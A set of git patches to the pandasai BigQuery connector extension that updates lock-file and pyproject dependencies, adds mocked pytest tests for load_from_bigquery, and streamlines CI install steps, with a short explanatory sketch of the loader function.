+ {file = "SQLAlchemy-2.0.36-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a4e46a888b54be23d03a89be510f24a7652fe6ff660787b96cd0e57a4ebcb46d"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4ae3005ed83f5967f961fd091f2f8c5329161f69ce8480aa8168b2d7fe37f06"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:03e08af7a5f9386a43919eda9de33ffda16b44eb11f3b313e6822243770e9763"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:3dbb986bad3ed5ceaf090200eba750b5245150bd97d3e67343a3cfed06feecf7"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-win32.whl", hash = "sha256:9fe53b404f24789b5ea9003fc25b9a3988feddebd7e7b369c8fac27ad6f52f28"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-win_amd64.whl", hash = "sha256:af148a33ff0349f53512a049c6406923e4e02bf2f26c5fb285f143faf4f0e46a"},
@@ -959,31 +978,6 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
-[[package]]
-name = "sqlalchemy-bigquery"
-version = "1.12.0"
-description = "SQLAlchemy dialect for BigQuery"
-optional = false
-python-versions = "<3.13,>=3.8"
-files = [
- {file = "sqlalchemy_bigquery-1.12.0-py2.py3-none-any.whl", hash = "sha256:5b2b77bdaefe9c0663db213d9475a5abbae88fa46108c352d19fa6fc51a47a1a"},
- {file = "sqlalchemy_bigquery-1.12.0.tar.gz", hash = "sha256:12783ad83ffad34e8e6e14046cb14bb2f1a3e7fb52676f5a24e940ff5cdeb864"},
-]
-
-[package.dependencies]
-google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev"
-google-auth = ">=1.25.0,<3.0.0dev"
-google-cloud-bigquery = ">=3.3.6,<4.0.0dev"
-packaging = "*"
-sqlalchemy = ">=1.4.16,<3.0.0dev"
-
-[package.extras]
-alembic = ["alembic"]
-all = ["GeoAlchemy2", "alembic", "google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "packaging", "pyarrow (>=3.0.0)", "pytz", "shapely"]
-bqstorage = ["google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "pyarrow (>=3.0.0)"]
-geography = ["GeoAlchemy2", "shapely"]
-tests = ["packaging", "pytz"]
-
[[package]]
name = "tomli"
version = "2.1.0"
@@ -1026,4 +1020,4 @@ zstd = ["zstandard (>=0.18.0)"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<3.12"
-content-hash = "6f45d047b8ea8bbe3581415b8eb32c846d8a4dbb0eb2cf8b10aa1b8202abb44c"
+content-hash = "b8eb06ba9664f21506f299ef72a72ff505ad7feb5d36540b8c61b87c2a84504f"
diff --git a/extensions/ee/connectors/bigquery/pyproject.toml b/extensions/ee/connectors/bigquery/pyproject.toml
index d58f62381..47159d818 100644
--- a/extensions/ee/connectors/bigquery/pyproject.toml
+++ b/extensions/ee/connectors/bigquery/pyproject.toml
@@ -9,7 +9,7 @@ readme = "README.md"
python = ">=3.9,<3.12"
pandasai = "^3.0.0"
pandasai-sql = "^0.1.0"
-sqlalchemy-bigquery = "^1.8.0"
+google-cloud-bigquery = "^3.27.0"
[tool.poetry.group.test]
optional = true
diff --git a/extensions/ee/connectors/bigquery/tests/test_bigquery.py b/extensions/ee/connectors/bigquery/tests/test_bigquery.py
new file mode 100644
index 000000000..de89908ce
--- /dev/null
+++ b/extensions/ee/connectors/bigquery/tests/test_bigquery.py
@@ -0,0 +1,68 @@
+import pytest
+from unittest.mock import patch, MagicMock
+import pandas as pd
+from pandasai_bigquery import load_from_bigquery
+
+
+@pytest.fixture
+def mock_connection_info():
+ return {
+ "project_id": "test-project",
+ "credentials": None,
+ }
+
+
+@pytest.fixture
+def mock_query_result():
+ # Mock query result with sample data
+ return [
+ {"column1": "value1", "column2": 123},
+ {"column1": "value2", "column2": 456},
+ ]
+
+
+def test_load_from_bigquery_success(mock_connection_info, mock_query_result):
+ query = "SELECT * FROM test_table"
+
+ # Mock the BigQuery client and query job
+ with patch("google.cloud.bigquery.Client") as MockBigQueryClient:
+ mock_client = MagicMock()
+ MockBigQueryClient.return_value = mock_client
+
+ mock_query_job = MagicMock()
+ mock_client.query.return_value = mock_query_job
+
+ mock_query_job.result.return_value = [
+ MagicMock(**row) for row in mock_query_result
+ ]
+
+ # Mock converting query results to DataFrame
+ mock_dataframe = pd.DataFrame(mock_query_result)
+ with patch("pandas.DataFrame", return_value=mock_dataframe):
+ result = load_from_bigquery(mock_connection_info, query)
+
+ # Assertions
+ mock_client.query.assert_called_once_with(query)
+ assert isinstance(result, type(mock_dataframe))
+ assert result.equals(mock_dataframe)
+
+
+def test_load_from_bigquery_failure(mock_connection_info):
+ query = "SELECT * FROM non_existent_table"
+
+ # Mock the BigQuery client and query job
+ with patch("google.cloud.bigquery.Client") as MockBigQueryClient:
+ mock_client = MagicMock()
+ MockBigQueryClient.return_value = mock_client
+
+ mock_query_job = MagicMock()
+ mock_client.query.return_value = mock_query_job
+
+ # Simulate an exception during query execution
+ mock_query_job.result.side_effect = Exception("Query failed")
+
+ with pytest.raises(Exception, match="Query failed"):
+ load_from_bigquery(mock_connection_info, query)
+
+ # Assertions
+ mock_client.query.assert_called_once_with(query)
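
The fragments of pandasai_bigquery/__init__.py visible above imply a loader of roughly this shape; the Client construction from connection_info is an assumption, since the hunk shows only the signature and the final pd.DataFrame(query_job.result()):

    from google.cloud import bigquery
    import pandas as pd

    def load_from_bigquery(connection_info, query):
        # Assumed mapping: project id and optional credentials come from connection_info.
        client = bigquery.Client(
            project=connection_info["project_id"],
            credentials=connection_info.get("credentials"),
        )
        query_job = client.query(query)          # what the test asserts was called once
        return pd.DataFrame(query_job.result())  # rows materialized into a DataFrame
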
From 4d8425296d1a6d0c4c29b940b8b7646dbf07acb0 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 20:46:03 +0100
Subject: [PATCH 56/58] fix: pandas not found in extension env
---
extensions/ee/connectors/bigquery/pyproject.toml | 1 +
1 file changed, 1 insertion(+)
diff --git a/extensions/ee/connectors/bigquery/pyproject.toml b/extensions/ee/connectors/bigquery/pyproject.toml
index 47159d818..a8e1b4219 100644
--- a/extensions/ee/connectors/bigquery/pyproject.toml
+++ b/extensions/ee/connectors/bigquery/pyproject.toml
@@ -9,6 +9,7 @@ readme = "README.md"
python = ">=3.9,<3.12"
pandasai = "^3.0.0"
pandasai-sql = "^0.1.0"
+sqlalchemy-bigquery = "^1.8.0"
google-cloud-bigquery = "^3.27.0"
[tool.poetry.group.test]
From ea9a37d686025feab2bc7a195286aac905540c64 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 20:56:12 +0100
Subject: [PATCH 57/58] fix: ci use pyproject
---
.github/workflows/ci.yml | 31 ++++++-------------------------
1 file changed, 6 insertions(+), 25 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index d438353d8..afd2e4767 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -54,10 +54,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
)
echo "Running tests for $dir"
(
@@ -75,10 +72,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
)
echo "Running tests for $dir"
(
@@ -96,10 +90,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
)
echo "Running tests for $dir"
(
@@ -118,10 +109,7 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
poetry run pytest tests/
Pop-Location
}
@@ -133,10 +121,7 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
poetry run pytest tests/
Pop-Location
}
@@ -148,11 +133,7 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
- poetry run pytest tests/
+ poetry install --all-extras --with test --verbose
Pop-Location
}
}
From 7c4119b3e908ec9a707ee428b53f3f6a7a8271a2 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 21:01:29 +0100
Subject: [PATCH 58/58] fix: lock file
---
extensions/ee/connectors/bigquery/poetry.lock | 29 +++++++++++++++++--
1 file changed, 27 insertions(+), 2 deletions(-)
diff --git a/extensions/ee/connectors/bigquery/poetry.lock b/extensions/ee/connectors/bigquery/poetry.lock
index dab545136..f56ffab8f 100644
--- a/extensions/ee/connectors/bigquery/poetry.lock
+++ b/extensions/ee/connectors/bigquery/poetry.lock
@@ -681,7 +681,7 @@ files = []
develop = true
[package.dependencies]
-numpy = "1.23.2"
+numpy = ">=1.23.2,<2.0.0"
pandasai = ">=3.0.0a0"
sqlalchemy = "^2.0.0"
@@ -978,6 +978,31 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
+[[package]]
+name = "sqlalchemy-bigquery"
+version = "1.12.0"
+description = "SQLAlchemy dialect for BigQuery"
+optional = false
+python-versions = "<3.13,>=3.8"
+files = [
+ {file = "sqlalchemy_bigquery-1.12.0-py2.py3-none-any.whl", hash = "sha256:5b2b77bdaefe9c0663db213d9475a5abbae88fa46108c352d19fa6fc51a47a1a"},
+ {file = "sqlalchemy_bigquery-1.12.0.tar.gz", hash = "sha256:12783ad83ffad34e8e6e14046cb14bb2f1a3e7fb52676f5a24e940ff5cdeb864"},
+]
+
+[package.dependencies]
+google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev"
+google-auth = ">=1.25.0,<3.0.0dev"
+google-cloud-bigquery = ">=3.3.6,<4.0.0dev"
+packaging = "*"
+sqlalchemy = ">=1.4.16,<3.0.0dev"
+
+[package.extras]
+alembic = ["alembic"]
+all = ["GeoAlchemy2", "alembic", "google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "packaging", "pyarrow (>=3.0.0)", "pytz", "shapely"]
+bqstorage = ["google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "pyarrow (>=3.0.0)"]
+geography = ["GeoAlchemy2", "shapely"]
+tests = ["packaging", "pytz"]
+
[[package]]
name = "tomli"
version = "2.1.0"
@@ -1020,4 +1045,4 @@ zstd = ["zstandard (>=0.18.0)"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<3.12"
-content-hash = "b8eb06ba9664f21506f299ef72a72ff505ad7feb5d36540b8c61b87c2a84504f"
+content-hash = "e7972cfc66fcbd6ec484ec17347ac40a2a0279847298b8a5303a02f78badbde1"